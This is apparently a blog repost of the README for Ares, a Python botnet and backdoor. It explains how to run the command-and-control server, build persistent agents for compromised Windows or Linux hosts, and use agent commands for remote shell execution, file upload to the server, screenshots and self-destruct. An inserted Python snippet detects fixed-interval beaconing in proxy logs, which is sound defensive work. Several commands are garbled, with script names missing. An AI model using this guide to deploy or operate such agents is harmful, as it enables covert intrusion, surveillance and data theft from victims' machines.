Ares - Python Botnet and Backdoor


Ares is a Python-based remote access tool.

It is made of two main programs:
  • A Command and Control (CnC) server, which is a Web interface to administer the agents
  • An agent program, which runs on the compromised host and handles communication with the CnC

The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.


Install the Python requirements:
pip install -r requirements.txt
Initialize the database:
cd server
./ initdb
In order to compile Windows agents on Linux, set up wine (optional):


Run with the builtin (debug) server:
./ runserver -h -p 8080 --threaded
Or run using gunicorn:
gunicorn ares:app -b --threads 20
The server should now be accessible on http://localhost:8080


Run the Python agent (update to suit your needs):
cd agent
Build a new agent to a standalone binary:
./ -p Linux --server http://localhost:8080 -o agent
To see a list of supported options, run ./ -h
./agent/ -h
usage: [-h] -p PLATFORM --server SERVER -o OUTPUT
[--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
[--max_failed_connections MAX_FAILED_CONNECTIONS]

Builds an Ares agent.

optional arguments:
-h, --help show this help message and exit
-p PLATFORM, --platform PLATFORM
Target platform (Windows, Linux).
--server SERVER Address of the CnC server (e.g http://localhost:8080).
-o OUTPUT, --output OUTPUT
Output file name.
--hello-interval HELLO_INTERVAL
Delay (in seconds) between each request to the CnC.
--idle_time IDLE_TIME
Inactivity time (in seconds) after which to go idle.
In idle mode, the agent pulls commands less often
(every <hello_interval> seconds).
--max_failed_connections MAX_FAILED_CONNECTIONS
The agent will self destruct if no contact with the
CnC can be made <max_failed_connections> times in a
--persistent Automatically install the agent on first run.
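
A detection-side illustration, added here and not part of the Ares project or the original post: the help text above says the agent requests the CnC at a fixed delay, which appears in web proxy logs as evenly spaced requests from one client to one host. The log format, addresses, sample timings and thresholds below are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

# Proxy log format assumed for this example: "<ISO time> <client ip> <method> <url>"
LINE_RE = re.compile(r"(?P<ts>\S+) (?P<client>\S+) \S+ https?://(?P<host>[^/\s]+)")

def find_beacons(lines, min_requests=8, tolerance=0.15, min_share=0.8):
    """Return {(client, host): typical gap in seconds} for fixed-interval request patterns."""
    seen = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            seen[(m["client"], m["host"])].append(datetime.fromisoformat(m["ts"]))
    hits = {}
    for pair, stamps in seen.items():
        if len(stamps) < min_requests:
            continue  # too few requests to judge periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        typical = median(gaps)
        if typical <= 0:
            continue
        # Share of gaps close to the typical one; tolerates a few missed or delayed polls.
        near = sum(abs(g - typical) <= tolerance * typical for g in gaps)
        if near / len(gaps) >= min_share:
            hits[pair] = typical
    return hits

def sample_log():
    """Constructed log lines: one fixed-interval poller and one irregular browser."""
    t0 = datetime(2024, 5, 1, 10, 0, 0)
    poller = [0, 10, 20, 31, 40, 50, 60, 95, 105, 115, 125]  # ~10 s apart, one stall
    browser = [0, 2, 3, 40, 41, 180, 185, 600, 602, 900]     # human-like bursts
    out = [f"{(t0 + timedelta(seconds=s)).isoformat()} 10.0.0.5 GET http://203.0.113.10:8080/x"
           for s in poller]
    out += [f"{(t0 + timedelta(seconds=s)).isoformat()} 10.0.0.7 GET http://intranet.example/page"
            for s in browser]
    return out

if __name__ == "__main__":
    for (client, host), gap in find_beacons(sample_log()).items():
        print(f"{client} -> {host}: request every ~{gap:.0f}s")
```

The median-based share test is one simple choice; it keeps flagging a poller that occasionally stalls, while bursty interactive browsing falls well below the threshold.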

Supported agent commands:
<any shell command>
Executes the command in a shell and returns its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

Takes a screenshot.

python <command|file>
Runs a Python command or local file.

Installs the agent.

Uninstalls the agent.

Kills the agent.

This help.

Reviewed by Dump3R H3id3gg3R on 2:03 AM